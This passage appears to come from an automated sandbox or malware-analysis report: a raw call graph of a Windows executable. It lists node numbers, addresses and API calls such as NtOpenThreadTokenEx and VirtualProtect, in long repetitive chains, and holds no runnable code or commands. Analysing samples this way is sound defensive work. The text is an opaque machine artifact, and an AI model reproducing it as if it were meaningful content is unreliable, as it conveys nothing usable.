3477->2796 3479 7ff6e17d2690 10 API calls 3478->3479 3480 7ff6e17d391e 3479->3480 3481 7ff6e17d3b21 3480->3481 3482 7ff6e17d14a9 2 API calls 3480->3482 3481->2809 3483 7ff6e17d3967 3482->3483 3490 7ff6e17d3b28 3483->3490 3842 7ff6e17d14b8 3483->3842 3486 7ff6e17d3a87 memset 3906 7ff6e17d148b 3486->3906 3489 7ff6e17d14b8 2 API calls 3492 7ff6e17d398f 3489->3492 4095 7ff6e17d15c6 3490->4095 3492->3486 3492->3489 3899 7ff6e17d15d5 3492->3899 3495 7ff6e17d14b8 2 API calls 3496 7ff6e17d3b07 3495->3496 3496->3490 3497 7ff6e17d3b0b 3496->3497 4030 7ff6e17d147c 3497->4030 3500 7ff6e17d145e 2 API calls 3500->3481 3502 7ff6e17d8320 malloc 3501->3502 3503 7ff6e17d13b8 3502->3503 3504 7ff6e17d13c6 NtOpenThreadTokenEx 3503->3504 3504->2866 3506 7ff6e17d266f 3505->3506 3506->3026 3506->3506 3575 7ff6e17d155d 3507->3575 3509 7ff6e17d27f4 3511 7ff6e17d14c7 2 API calls 3509->3511 3510 7ff6e17d2d27 3514 7ff6e17d2816 3511->3514 3512 7ff6e17d2785 wcsncmp 3600 7ff6e17d14e5 3512->3600 3516 7ff6e17d1503 2 API calls 3514->3516 3517 7ff6e17d283d 3516->3517 3518 7ff6e17d2847 memset 3517->3518 3519 7ff6e17d2877 3518->3519 3520 7ff6e17d28bc wcscpy wcscat wcslen 3519->3520 3521 7ff6e17d28ee wcslen 3520->3521 3522 7ff6e17d291a 3520->3522 3521->3522 3523 7ff6e17d2967 wcslen 3522->3523 3526 7ff6e17d2985 3522->3526 3523->3526 3524 7ff6e17d29d9 wcslen 3525 7ff6e17d14a9 2 API calls 3524->3525 3527 7ff6e17d2a73 3525->3527 3526->3510 3526->3524 3528 7ff6e17d14a9 2 API calls 3527->3528 3529 7ff6e17d2bd2 3528->3529 3647 7ff6e17d14f4 3529->3647 3532 7ff6e17d14c7 2 API calls 3533 7ff6e17d2c99 3532->3533 3534 7ff6e17d14c7 2 API calls 3533->3534 3535 7ff6e17d2cb1 3534->3535 3536 7ff6e17d145e 2 API calls 3535->3536 3537 7ff6e17d2cbb 3536->3537 3538 7ff6e17d145e 2 API calls 3537->3538 3539 7ff6e17d2cc5 3538->3539 3539->3029 3541 7ff6e17d1394 2 API calls 3540->3541 3542 7ff6e17d1521 3541->3542 3543 7ff6e17d1394 2 API calls 3542->3543 3544 7ff6e17d1530 3543->3544 3545 7ff6e17d1394 2 API calls 3544->3545 3546 7ff6e17d153f 3545->3546 3547 7ff6e17d1394 2 API calls 3546->3547 3548 7ff6e17d154e 3547->3548 3549 7ff6e17d1394 2 API calls 3548->3549 3550 7ff6e17d155d 3549->3550 3551 7ff6e17d1394 2 API calls 3550->3551 3552 7ff6e17d156c 3551->3552 3553 7ff6e17d1394 2 API calls 3552->3553 3554 7ff6e17d157b 3553->3554 3555 7ff6e17d1394 2 API calls 3554->3555 3556 7ff6e17d158a 3555->3556 3557 7ff6e17d1394 2 API calls 3556->3557 3558 7ff6e17d1599 3557->3558 3559 7ff6e17d1394 2 API calls 3558->3559 3560 7ff6e17d15a8 3559->3560 3561 7ff6e17d1394 2 API calls 3560->3561 3562 7ff6e17d15b7 3561->3562 3563 7ff6e17d15c6 3562->3563 3564 7ff6e17d1394 2 API calls 3562->3564 3565 7ff6e17d1394 2 API calls 3563->3565 3564->3563 3566 7ff6e17d15d0 3565->3566 3567 7ff6e17d15d5 3566->3567 3568 7ff6e17d1394 2 API calls 3566->3568 3569 7ff6e17d1394 2 API calls 3567->3569 3568->3567 3570 7ff6e17d15df 3569->3570 3571 7ff6e17d15e4 3570->3571 3572 7ff6e17d1394 2 API calls 3570->3572 3573 7ff6e17d1394 2 API calls 3571->3573 3572->3571 3574 7ff6e17d15f3 3573->3574 3574->3031 3576 7ff6e17d1394 2 API calls 3575->3576 3577 7ff6e17d156c 3576->3577 3578 7ff6e17d1394 2 API calls 3577->3578 3579 7ff6e17d157b 3578->3579 3580 7ff6e17d1394 2 API calls 3579->3580 3581 7ff6e17d158a 3580->3581 3582 7ff6e17d1394 2 API calls 3581->3582 3583 7ff6e17d1599 3582->3583 3584 7ff6e17d1394 2 API calls 3583->3584 3585 7ff6e17d15a8 3584->3585 3586 7ff6e17d1394 2 API calls 3585->3586 3587 7ff6e17d15b7 3586->3587 3588 7ff6e17d15c6 3587->3588 3589 7ff6e17d1394 2 API calls 3587->3589 3590 7ff6e17d1394 2 API calls 3588->3590 3589->3588 3591 7ff6e17d15d0 3590->3591 3592 7ff6e17d15d5 3591->3592 3593 7ff6e17d1394 2 API calls 3591->3593 3594 7ff6e17d1394 2 API calls 3592->3594 3593->3592 3595 7ff6e17d15df 3594->3595 3596 7ff6e17d15e4 3595->3596 3597 7ff6e17d1394 2 API calls 3595->3597 3598 7ff6e17d1394 2 API calls 3596->3598 3597->3596 3599 7ff6e17d15f3 3598->3599 3599->3509 3599->3510 3599->3512 3601 7ff6e17d1394 2 API calls 3600->3601 3602 7ff6e17d14ef 3601->3602 3603 7ff6e17d14f4 3602->3603 3604 7ff6e17d1394 2 API calls 3602->3604 3605 7ff6e17d1394 2 API calls 3603->3605 3604->3603 3606 7ff6e17d14fe 3605->3606 3607 7ff6e17d1503 3606->3607 3608 7ff6e17d1394 2 API calls 3606->3608 3609 7ff6e17d1394 2 API calls 3607->3609 3608->3607 3610 7ff6e17d150d 3609->3610 3611 7ff6e17d1394 2 API calls 3610->3611 3612 7ff6e17d1512 3611->3612 3613 7ff6e17d1394 2 API calls 3612->3613 3614 7ff6e17d1521 3613->3614 3615 7ff6e17d1394 2 API calls 3614->3615 3616 7ff6e17d1530 3615->3616 3617 7ff6e17d1394 2 API calls 3616->3617 3618 7ff6e17d153f 3617->3618 3619 7ff6e17d1394 2 API calls 3618->3619 3620 7ff6e17d154e 3619->3620 3621 7ff6e17d1394 2 API calls 3620->3621 3622 7ff6e17d155d 3621->3622 3623 7ff6e17d1394 2 API calls 3622->3623 3624 7ff6e17d156c 3623->3624 3625 7ff6e17d1394 2 API calls 3624->3625 3626 7ff6e17d157b 3625->3626 3627 7ff6e17d1394 2 API calls 3626->3627 3628 7ff6e17d158a 3627->3628 3629 7ff6e17d1394 2 API calls 3628->3629 3630 7ff6e17d1599 3629->3630 3631 7ff6e17d1394 2 API calls 3630->3631 3632 7ff6e17d15a8 3631->3632 3633 7ff6e17d1394 2 API calls 3632->3633 3634 7ff6e17d15b7 3633->3634 3635 7ff6e17d15c6 3634->3635 3636 7ff6e17d1394 2 API calls 3634->3636 3637 7ff6e17d1394 2 API calls 3635->3637 3636->3635 3638 7ff6e17d15d0 3637->3638 3639 7ff6e17d15d5 3638->3639 3640 7ff6e17d1394 2 API calls 3638->3640 3641 7ff6e17d1394 2 API calls 3639->3641 3640->3639 3642 7ff6e17d15df 3641->3642 3643 7ff6e17d15e4 3642->3643 3644 7ff6e17d1394 2 API calls 3642->3644 3645 7ff6e17d1394 2 API calls 3643->3645 3644->3643 3646 7ff6e17d15f3 3645->3646 3646->3509 3648 7ff6e17d1394 2 API calls 3647->3648 3649 7ff6e17d14fe 3648->3649 3650 7ff6e17d1503 3649->3650 3651 7ff6e17d1394 2 API calls 3649->3651 3652 7ff6e17d1394 2 API calls 3650->3652 3651->3650 3653 7ff6e17d150d 3652->3653 3654 7ff6e17d1394 2 API calls 3653->3654 3655 7ff6e17d1512 3654->3655 3656 7ff6e17d1394 2 API calls 3655->3656 3657 7ff6e17d1521 3656->3657 3658 7ff6e17d1394 2 API calls 3657->3658 3659 7ff6e17d1530 3658->3659 3660 7ff6e17d1394 2 API calls 3659->3660 3661 7ff6e17d153f 3660->3661 3662 7ff6e17d1394 2 API calls 3661->3662 3663 7ff6e17d154e 3662->3663 3664 7ff6e17d1394 2 API calls 3663->3664 3665 7ff6e17d155d 3664->3665 3666 7ff6e17d1394 2 API calls 3665->3666 3667 7ff6e17d156c 3666->3667 3668 7ff6e17d1394 2 API calls 3667->3668 3669 7ff6e17d157b 3668->3669 3670 7ff6e17d1394 2 API calls 3669->3670 3671 7ff6e17d158a 3670->3671 3672 7ff6e17d1394 2 API calls 3671->3672 3673 7ff6e17d1599 3672->3673 3674 7ff6e17d1394 2 API calls 3673->3674 3675 7ff6e17d15a8 3674->3675 3676 7ff6e17d1394 2 API calls 3675->3676 3677 7ff6e17d15b7 3676->3677 3678 7ff6e17d15c6 3677->3678 3679 7ff6e17d1394 2 API calls 3677->3679 3680 7ff6e17d1394 2 API calls 3678->3680 3679->3678 3681 7ff6e17d15d0 3680->3681 3682 7ff6e17d15d5 3681->3682 3683 7ff6e17d1394 2 API calls 3681->3683 3684 7ff6e17d1394 2 API calls 3682->3684 3683->3682 3685 7ff6e17d15df 3684->3685 3686 7ff6e17d15e4 3685->3686 3687 7ff6e17d1394 2 API calls 3685->3687 3688 7ff6e17d1394 2 API calls 3686->3688 3687->3686 3689 7ff6e17d15f3 3688->3689 3689->3532 3691 7ff6e17d1394 2 API calls 3690->3691 3692 7ff6e17d1431 3691->3692 3693 7ff6e17d1394 2 API calls 3692->3693 3694 7ff6e17d1440 3693->3694 3695 7ff6e17d1394 2 API calls 3694->3695 3696 7ff6e17d144f 3695->3696 3697 7ff6e17d1394 2 API calls 3696->3697 3698 7ff6e17d145e 3697->3698 3699 7ff6e17d1394 2 API calls 3698->3699 3700 7ff6e17d146d 3699->3700 3701 7ff6e17d1394 2 API calls 3700->3701 3702 7ff6e17d147c 3701->3702 3703 7ff6e17d1394 2 API calls 3702->3703 3704 7ff6e17d148b 3703->3704 3705 7ff6e17d1394 2 API calls 3704->3705 3706 7ff6e17d149a 3705->3706 3707 7ff6e17d1394 2 API calls 3706->3707 3708 7ff6e17d14a9 3707->3708 3709 7ff6e17d14b8 3708->3709 3710 7ff6e17d1394 2 API calls 3708->3710 3711 7ff6e17d1394 2 API calls 3709->3711 3710->3709 3712 7ff6e17d14c2 3711->3712 3713 7ff6e17d14c7 3712->3713 3714 7ff6e17d1394 2 API calls 3712->3714 3715 7ff6e17d1394 2 API calls 3713->3715 3714->3713 3716 7ff6e17d14d6 3715->3716 3717 7ff6e17d1394 2 API calls 3716->3717 3718 7ff6e17d14e0 3717->3718 3719 7ff6e17d14e5 3718->3719 3720 7ff6e17d1394 2 API calls 3718->3720 3721 7ff6e17d1394 2 API calls 3719->3721 3720->3719 3722 7ff6e17d14ef 3721->3722 3723 7ff6e17d14f4 3722->3723 3724 7ff6e17d1394 2 API calls 3722->3724 3725 7ff6e17d1394 2 API calls 3723->3725 3724->3723 3726 7ff6e17d14fe 3725->3726 3727 7ff6e17d1503 3726->3727 3728 7ff6e17d1394 2 API calls 3726->3728 3729 7ff6e17d1394 2 API calls 3727->3729 3728->3727 3730 7ff6e17d150d 3729->3730 3731 7ff6e17d1394 2 API calls 3730->3731 3732 7ff6e17d1512 3731->3732 3733 7ff6e17d1394 2 API calls 3732->3733 3734 7ff6e17d1521 3733->3734 3735 7ff6e17d1394 2 API calls 3734->3735 3736 7ff6e17d1530 3735->3736 3737 7ff6e17d1394 2 API calls 3736->3737 3738 7ff6e17d153f 3737->3738 3739 7ff6e17d1394 2 API calls 3738->3739 3740 7ff6e17d154e 3739->3740 3741 7ff6e17d1394 2 API calls 3740->3741 3742 7ff6e17d155d 3741->3742 3743 7ff6e17d1394 2 API calls 3742->3743 3744 7ff6e17d156c 3743->3744 3745 7ff6e17d1394 2 API calls 3744->3745 3746 7ff6e17d157b 3745->3746 3747 7ff6e17d1394 2 API calls 3746->3747 3748 7ff6e17d158a 3747->3748 3749 7ff6e17d1394 2 API calls 3748->3749 3750 7ff6e17d1599 3749->3750 3751 7ff6e17d1394 2 API calls 3750->3751 3752 7ff6e17d15a8 3751->3752 3753 7ff6e17d1394 2 API calls 3752->3753 3754 7ff6e17d15b7 3753->3754 3755 7ff6e17d15c6 3754->3755 3756 7ff6e17d1394 2 API calls 3754->3756 3757 7ff6e17d1394 2 API calls 3755->3757 3756->3755 3758 7ff6e17d15d0 3757->3758 3759 7ff6e17d15d5 3758->3759 3760 7ff6e17d1394 2 API calls 3758->3760 3761 7ff6e17d1394 2 API calls 3759->3761 3760->3759 3762 7ff6e17d15df 3761->3762 3763 7ff6e17d15e4 3762->3763 3764 7ff6e17d1394 2 API calls 3762->3764 3765 7ff6e17d1394 2 API calls 3763->3765 3764->3763 3766 7ff6e17d15f3 3765->3766 3766->3410 3768 7ff6e17d1394 2 API calls 3767->3768 3769 7ff6e17d1440 3768->3769 3770 7ff6e17d1394 2 API calls 3769->3770 3771 7ff6e17d144f 3770->3771 3772 7ff6e17d1394 2 API calls 3771->3772 3773 7ff6e17d145e 3772->3773 3774 7ff6e17d1394 2 API calls 3773->3774 3775 7ff6e17d146d 3774->3775 3776 7ff6e17d1394 2 API calls 3775->3776 3777 7ff6e17d147c 3776->3777 3778 7ff6e17d1394 2 API calls 3777->3778 3779 7ff6e17d148b 3778->3779 3780 7ff6e17d1394 2 API calls 3779->3780 3781 7ff6e17d149a 3780->3781 3782 7ff6e17d1394 2 API calls 3781->3782 3783 7ff6e17d14a9 3782->3783 3784 7ff6e17d14b8 3783->3784 3785 7ff6e17d1394 2 API calls 3783->3785 3786 7ff6e17d1394 2 API calls 3784->3786 3785->3784 3787 7ff6e17d14c2 3786->3787 3788 7ff6e17d14c7 3787->3788 3789 7ff6e17d1394 2 API calls 3787->3789 3790 7ff6e17d1394 2 API calls 3788->3790 3789->3788 3791 7ff6e17d14d6 3790->3791 3792 7ff6e17d1394 2 API calls 3791->3792 3793 7ff6e17d14e0 3792->3793 3794 7ff6e17d14e5 3793->3794 3795 7ff6e17d1394 2 API calls 3793->3795 3796 7ff6e17d1394 2 API calls 3794->3796 3795->3794 3797 7ff6e17d14ef 3796->3797 3798 7ff6e17d14f4 3797->3798 3799 7ff6e17d1394 2 API calls 3797->3799 3800 7ff6e17d1394 2 API calls 3798->3800 3799->3798 3801 7ff6e17d14fe 3800->3801 3802 7ff6e17d1503 3801->3802 3803 7ff6e17d1394 2 API calls 3801->3803 3804 7ff6e17d1394 2 API calls 3802->3804 3803->3802 3805 7ff6e17d150d 3804->3805 3806 7ff6e17d1394 2 API calls 3805->3806 3807 7ff6e17d1512 3806->3807 3808 7ff6e17d1394 2 API calls 3807->3808 3809 7ff6e17d1521 3808->3809 3810 7ff6e17d1394 2 API calls 3809->3810 3811 7ff6e17d1530 3810->3811 3812 7ff6e17d1394 2 API calls 3811->3812 3813 7ff6e17d153f 3812->3813 3814 7ff6e17d1394 2 API calls 3813->3814 3815 7ff6e17d154e 3814->3815 3816 7ff6e17d1394 2 API calls 3815->3816 3817 7ff6e17d155d 3816->3817 3818 7ff6e17d1394 2 API calls 3817->3818 3819 7ff6e17d156c 3818->3819 3820 7ff6e17d1394 2 API calls 3819->3820 3821 7ff6e17d157b 3820->3821 3822 7ff6e17d1394 2 API calls 3821->3822 3823 7ff6e17d158a 3822->3823 3824 7ff6e17d1394 2 API calls 3823->3824 3825 7ff6e17d1599 3824->3825 3826 7ff6e17d1394 2 API calls 3825->3826 3827 7ff6e17d15a8 3826->3827 3828 7ff6e17d1394 2 API calls 3827->3828 3829 7ff6e17d15b7 3828->3829 3830 7ff6e17d15c6 3829->3830 3831 7ff6e17d1394 2 API calls 3829->3831 3832 7ff6e17d1394 2 API calls 3830->3832 3831->3830 3833 7ff6e17d15d0 3832->3833 3834 7ff6e17d15d5 3833->3834 3835 7ff6e17d1394 2 API calls 3833->3835 3836 7ff6e17d1394 2 API calls 3834->3836 3835->3834 3837 7ff6e17d15df 3836->3837 3838 7ff6e17d15e4 3837->3838 3839 7ff6e17d1394 2 API calls 3837->3839 3840 7ff6e17d1394 2 API calls 3838->3840 3839->3838 3841 7ff6e17d15f3 3840->3841 3841->3419 3843 7ff6e17d1394 2 API calls 3842->3843 3844 7ff6e17d14c2 3843->3844 3845 7ff6e17d14c7 3844->3845 3846 7ff6e17d1394 2 API calls 3844->3846 3847 7ff6e17d1394 2 API calls 3845->3847 3846->3845 3848 7ff6e17d14d6 3847->3848 3849 7ff6e17d1394 2 API calls 3848->3849 3850 7ff6e17d14e0 3849->3850 3851 7ff6e17d14e5 3850->3851 3852 7ff6e17d1394 2 API calls 3850->3852 3853 7ff6e17d1394 2 API calls 3851->3853 3852->3851 3854 7ff6e17d14ef 3853->3854 3855 7ff6e17d14f4 3854->3855 3856 7ff6e17d1394 2 API calls 3854->3856 3857 7ff6e17d1394 2 API calls 3855->3857 3856->3855 3858 7ff6e17d14fe 3857->3858 3859 7ff6e17d1503 3858->3859 3860 7ff6e17d1394 2 API calls 3858->3860 3861 7ff6e17d1394 2 API calls 3859->3861 3860->3859 3862 7ff6e17d150d 3861->3862 3863 7ff6e17d1394 2 API calls 3862->3863 3864 7ff6e17d1512 3863->3864 3865 7ff6e17d1394 2 API calls 3864->3865 3866 7ff6e17d1521 3865->3866 3867 7ff6e17d1394 2 API calls 3866->3867 3868 7ff6e17d1530 3867->3868 3869 7ff6e17d1394 2 API calls 3868->3869 3870 7ff6e17d153f 3869->3870 3871 7ff6e17d1394 2 API calls 3870->3871 3872 7ff6e17d154e 3871->3872 3873 7ff6e17d1394 2 API calls 3872->3873 3874 7ff6e17d155d 3873->3874 3875 7ff6e17d1394 2 API calls 3874->3875 3876 7ff6e17d156c 3875->3876 3877 7ff6e17d1394 2 API calls 3876->3877 3878 7ff6e17d157b 3877->3878 3879 7ff6e17d1394 2 API calls 3878->3879 3880 7ff6e17d158a 3879->3880 3881 7ff6e17d1394 2 API calls 3880->3881 3882 7ff6e17d1599 3881->3882 3883 7ff6e17d1394 2 API calls 3882->3883 3884 7ff6e17d15a8 3883->3884 3885 7ff6e17d1394 2 API calls 3884->3885 3886 7ff6e17d15b7 3885->3886 3887 7ff6e17d15c6 3886->3887 3888 7ff6e17d1394 2 API calls 3886->3888 3889 7ff6e17d1394 2 API calls 3887->3889 3888->3887 3890 7ff6e17d15d0 3889->3890 3891 7ff6e17d15d5 3890->3891 3892 7ff6e17d1394 2 API calls 3890->3892 3893 7ff6e17d1394 2 API calls 3891->3893 3892->3891 3894 7ff6e17d15df 3893->3894 3895 7ff6e17d15e4 3894->3895 3896 7ff6e17d1394 2 API calls 3894->3896 3897 7ff6e17d1394 2 API calls 3895->3897 3896->3895 3898 7ff6e17d15f3 3897->3898 3898->3492 3900 7ff6e17d1394 2 API calls 3899->3900 3901 7ff6e17d15df 3900->3901 3902 7ff6e17d15e4 3901->3902 3903 7ff6e17d1394 2 API calls 3901->3903 3904 7ff6e17d1394 2 API calls 3902->3904 3903->3902 3905 7ff6e17d15f3 3904->3905 3905->3492 3907 7ff6e17d1394 2 API calls 3906->3907 3908 7ff6e17d149a 3907->3908 3909 7ff6e17d1394 2 API calls 3908->3909 3910 7ff6e17d14a9 3909->3910 3911 7ff6e17d14b8 3910->3911 3912 7ff6e17d1394 2 API calls 3910->3912 3913 7ff6e17d1394 2 API calls 3911->3913 3912->3911 3914 7ff6e17d14c2 3913->3914 3915 7ff6e17d14c7 3914->3915 3916 7ff6e17d1394 2 API calls 3914->3916 3917 7ff6e17d1394 2 API calls 3915->3917 3916->3915 3918 7ff6e17d14d6 3917->3918 3919 7ff6e17d1394 2 API calls 3918->3919 3920 7ff6e17d14e0 3919->3920 3921 7ff6e17d14e5 3920->3921 3922 7ff6e17d1394 2 API calls 3920->3922 3923 7ff6e17d1394 2 API calls 3921->3923 3922->3921 3924 7ff6e17d14ef 3923->3924 3925 7ff6e17d14f4 3924->3925 3926 7ff6e17d1394 2 API calls 3924->3926 3927 7ff6e17d1394 2 API calls 3925->3927 3926->3925 3928 7ff6e17d14fe 3927->3928 3929 7ff6e17d1503 3928->3929 3930 7ff6e17d1394 2 API calls 3928->3930 3931 7ff6e17d1394 2 API calls 3929->3931 3930->3929 3932 7ff6e17d150d 3931->3932 3933 7ff6e17d1394 2 API calls 3932->3933 3934 7ff6e17d1512 3933->3934 3935 7ff6e17d1394 2 API calls 3934->3935 3936 7ff6e17d1521 3935->3936 3937 7ff6e17d1394 2 API calls 3936->3937 3938 7ff6e17d1530 3937->3938 3939 7ff6e17d1394 2 API calls 3938->3939 3940 7ff6e17d153f 3939->3940 3941 7ff6e17d1394 2 API calls 3940->3941 3942 7ff6e17d154e 3941->3942 3943 7ff6e17d1394 2 API calls 3942->3943 3944 7ff6e17d155d 3943->3944 3945 7ff6e17d1394 2 API calls 3944->3945 3946 7ff6e17d156c 3945->3946 3947 7ff6e17d1394 2 API calls 3946->3947 3948 7ff6e17d157b 3947->3948 3949 7ff6e17d1394 2 API calls 3948->3949 3950 7ff6e17d158a 3949->3950 3951 7ff6e17d1394 2 API calls 3950->3951 3952 7ff6e17d1599 3951->3952 3953 7ff6e17d1394 2 API calls 3952->3953 3954 7ff6e17d15a8 3953->3954 3955 7ff6e17d1394 2 API calls 3954->3955 3956 7ff6e17d15b7 3955->3956 3957 7ff6e17d15c6 3956->3957 3958 7ff6e17d1394 2 API calls 3956->3958 3959 7ff6e17d1394 2 API calls 3957->3959 3958->3957 3960 7ff6e17d15d0 3959->3960 3961 7ff6e17d15d5 3960->3961 3962 7ff6e17d1394 2 API calls 3960->3962 3963 7ff6e17d1394 2 API calls 3961->3963 3962->3961 3964 7ff6e17d15df 3963->3964 3965 7ff6e17d15e4 3964->3965 3966 7ff6e17d1394 2 API calls 3964->3966 3967 7ff6e17d1394 2 API calls 3965->3967 3966->3965 3968 7ff6e17d15f3 3967->3968 3968->3490 3969 7ff6e17d149a 3968->3969 3970 7ff6e17d1394 2 API calls 3969->3970 3971 7ff6e17d14a9 3970->3971 3972 7ff6e17d14b8 3971->3972 3973 7ff6e17d1394 2 API calls 3971->3973 3974 7ff6e17d1394 2 API calls 3972->3974 3973->3972 3975 7ff6e17d14c2 3974->3975 3976 7ff6e17d14c7 3975->3976 3977 7ff6e17d1394 2 API calls 3975->3977 3978 7ff6e17d1394 2 API calls 3976->3978 3977->3976 3979 7ff6e17d14d6 3978->3979 3980 7ff6e17d1394 2 API calls 3979->3980 3981 7ff6e17d14e0 3980->3981 3982 7ff6e17d14e5 3981->3982 3983 7ff6e17d1394 2 API calls 3981->3983 3984 7ff6e17d1394 2 API calls 3982->3984 3983->3982 3985 7ff6e17d14ef 3984->3985 3986 7ff6e17d14f4 3985->3986 3987 7ff6e17d1394 2 API calls 3985->3987 3988 7ff6e17d1394 2 API calls 3986->3988 3987->3986 3989 7ff6e17d14fe 3988->3989 3990 7ff6e17d1503 3989->3990 3991 7ff6e17d1394 2 API calls 3989->3991 3992 7ff6e17d1394 2 API calls 3990->3992 3991->3990 3993 7ff6e17d150d 3992->3993 3994 7ff6e17d1394 2 API calls 3993->3994 3995 7ff6e17d1512 3994->3995 3996 7ff6e17d1394 2 API calls 3995->3996 3997 7ff6e17d1521 3996->3997 3998 7ff6e17d1394 2 API calls 3997->3998 3999 7ff6e17d1530 3998->3999 4000 7ff6e17d1394 2 API calls 3999->4000 4001 7ff6e17d153f 4000->4001 4002 7ff6e17d1394 2 API calls 4001->4002 4003 7ff6e17d154e 4002->4003 4004 7ff6e17d1394 2 API calls 4003->4004 4005 7ff6e17d155d 4004->4005 4006 7ff6e17d1394 2 API calls 4005->4006 4007 7ff6e17d156c 4006->4007 4008 7ff6e17d1394 2 API calls 4007->4008 4009 7ff6e17d157b 4008->4009 4010 7ff6e17d1394 2 API calls 4009->4010 4011 7ff6e17d158a 4010->4011 4012 7ff6e17d1394 2 API calls 4011->4012 4013 7ff6e17d1599 4012->4013 4014 7ff6e17d1394 2 API calls 4013->4014 4015 7ff6e17d15a8 4014->4015 4016 7ff6e17d1394 2 API calls 4015->4016 4017 7ff6e17d15b7 4016->4017 4018 7ff6e17d15c6 4017->4018 4019 7ff6e17d1394 2 API calls 4017->4019 4020 7ff6e17d1394 2 API calls 4018->4020 4019->4018 4021 7ff6e17d15d0 4020->4021 4022 7ff6e17d15d5 4021->4022 4023 7ff6e17d1394 2 API calls 4021->4023 4024 7ff6e17d1394 2 API calls 4022->4024 4023->4022 4025 7ff6e17d15df 4024->4025 4026 7ff6e17d15e4 4025->4026 4027 7ff6e17d1394 2 API calls 4025->4027 4028 7ff6e17d1394 2 API calls 4026->4028 4027->4026 4029 7ff6e17d15f3 4028->4029 4029->3490 4029->3495 4031 7ff6e17d1394 2 API calls 4030->4031 4032 7ff6e17d148b 4031->4032 4033 7ff6e17d1394 2 API calls 4032->4033 4034 7ff6e17d149a 4033->4034 4035 7ff6e17d1394 2 API calls 4034->4035 4036 7ff6e17d14a9 4035->4036 4037 7ff6e17d14b8 4036->4037 4038 7ff6e17d1394 2 API calls 4036->4038 4039 7ff6e17d1394 2 API calls 4037->4039 4038->4037 4040 7ff6e17d14c2 4039->4040 4041 7ff6e17d14c7 4040->4041 4042 7ff6e17d1394 2 API calls 4040->4042 4043 7ff6e17d1394 2 API calls 4041->4043 4042->4041 4044 7ff6e17d14d6 4043->4044 4045 7ff6e17d1394 2 API calls 4044->4045 4046 7ff6e17d14e0 4045->4046 4047 7ff6e17d14e5 4046->4047 4048 7ff6e17d1394 2 API calls 4046->4048 4049 7ff6e17d1394 2 API calls 4047->4049 4048->4047 4050 7ff6e17d14ef 4049->4050 4051 7ff6e17d14f4 4050->4051 4052 7ff6e17d1394 2 API calls 4050->4052 4053 7ff6e17d1394 2 API calls 4051->4053 4052->4051 4054 7ff6e17d14fe 4053->4054 4055 7ff6e17d1503 4054->4055 4056 7ff6e17d1394 2 API calls 4054->4056 4057 7ff6e17d1394 2 API calls 4055->4057 4056->4055 4058 7ff6e17d150d 4057->4058 4059 7ff6e17d1394 2 API calls 4058->4059 4060 7ff6e17d1512 4059->4060 4061 7ff6e17d1394 2 API calls 4060->4061 4062 7ff6e17d1521 4061->4062 4063 7ff6e17d1394 2 API calls 4062->4063 4064 7ff6e17d1530 4063->4064 4065 7ff6e17d1394 2 API calls 4064->4065 4066 7ff6e17d153f 4065->4066 4067 7ff6e17d1394 2 API calls 4066->4067 4068 7ff6e17d154e 4067->4068 4069 7ff6e17d1394 2 API calls 4068->4069 4070 7ff6e17d155d 4069->4070 4071 7ff6e17d1394 2 API calls 4070->4071 4072 7ff6e17d156c 4071->4072 4073 7ff6e17d1394 2 API calls 4072->4073 4074 7ff6e17d157b 4073->4074 4075 7ff6e17d1394 2 API calls 4074->4075 4076 7ff6e17d158a 4075->4076 4077 7ff6e17d1394 2 API calls 4076->4077 4078 7ff6e17d1599 4077->4078 4079 7ff6e17d1394 2 API calls 4078->4079 4080 7ff6e17d15a8 4079->4080 4081 7ff6e17d1394 2 API calls 4080->4081 4082 7ff6e17d15b7 4081->4082 4083 7ff6e17d15c6 4082->4083 4084 7ff6e17d1394 2 API calls 4082->4084 4085 7ff6e17d1394 2 API calls 4083->4085 4084->4083 4086 7ff6e17d15d0 4085->4086 4087 7ff6e17d15d5 4086->4087 4088 7ff6e17d1394 2 API calls 4086->4088 4089 7ff6e17d1394 2 API calls 4087->4089 4088->4087 4090 7ff6e17d15df 4089->4090 4091 7ff6e17d15e4 4090->4091 4092 7ff6e17d1394 2 API calls 4090->4092 4093 7ff6e17d1394 2 API calls 4091->4093 4092->4091 4094 7ff6e17d15f3 4093->4094 4094->3500 4096 7ff6e17d1394 2 API calls 4095->4096 4097 7ff6e17d15d0 4096->4097 4098 7ff6e17d15d5 4097->4098 4099 7ff6e17d1394 2 API calls 4097->4099 4100 7ff6e17d1394 2 API calls 4098->4100 4099->4098 4101 7ff6e17d15df 4100->4101 4102 7ff6e17d15e4 4101->4102 4103 7ff6e17d1394 2 API calls 4101->4103 4104 7ff6e17d1394 2 API calls 4102->4104 4103->4102 4105 7ff6e17d15f3 4104->4105 4105->3481 4174 7ff6e17d1000 4175 7ff6e17d108b __set_app_type 4174->4175 4176 7ff6e17d1040 4174->4176 4178 7ff6e17d10b6 4175->4178 4176->4175 4177 7ff6e17d10e5 4178->4177 4180 7ff6e17d1e00 4178->4180 4181 7ff6e17d88b0 __setusermatherr 4180->4181 4182 7ff6e17d1800 4183 7ff6e17d1812 4182->4183 4184 7ff6e17d1835 fprintf 4183->4184 4200 7ff6e17d2320 strlen 4201 7ff6e17d2337 4200->4201 4202 7ff6e17d1ab3 4204 7ff6e17d1a70 4202->4204 4203 7ff6e17d199e 4207 7ff6e17d1a0f 4203->4207 4210 7ff6e17d19e9 VirtualProtect 4203->4210 4204->4202 4204->4203 4205 7ff6e17d1b36 4204->4205 4209 7ff6e17d1b5c 4204->4209 4206 7ff6e17d1ba0 4 API calls 4205->4206 4208 7ff6e17d1b53 4206->4208 4210->4203 2628 7ff6e17d1394 2632 7ff6e17d8320 2628->2632 2630 7ff6e17d13b8 2631 7ff6e17d13c6 NtOpenThreadTokenEx 2630->2631 2633 7ff6e17d833e 2632->2633 2636 7ff6e17d836b 2632->2636 2633->2630 2634 7ff6e17d8413 2635 7ff6e17d842f malloc 2634->2635 2637 7ff6e17d8450 2635->2637 2636->2633 2636->2634 2637->2633 4115 7ff6e17d1ad4 4116 7ff6e17d1a70 4115->4116 4117 7ff6e17d1b5c 4116->4117 4118 7ff6e17d1b36 4116->4118 4121 7ff6e17d199e 4116->4121 4119 7ff6e17d1ba0 4 API calls 4118->4119 4123 7ff6e17d1b53 4119->4123 4120 7ff6e17d1a0f 4121->4120 4122 7ff6e17d19e9 VirtualProtect 4121->4122 4122->4121 4123->4123 4153 7ff6e17d216f 4154 7ff6e17d2185 4153->4154 4155 7ff6e17d2178 InitializeCriticalSection 4153->4155 4155->4154 4124 7ff6e17d1fd0 4125 7ff6e17d1fe4 4124->4125 4126 7ff6e17d2033 4124->4126 4125->4126 4127 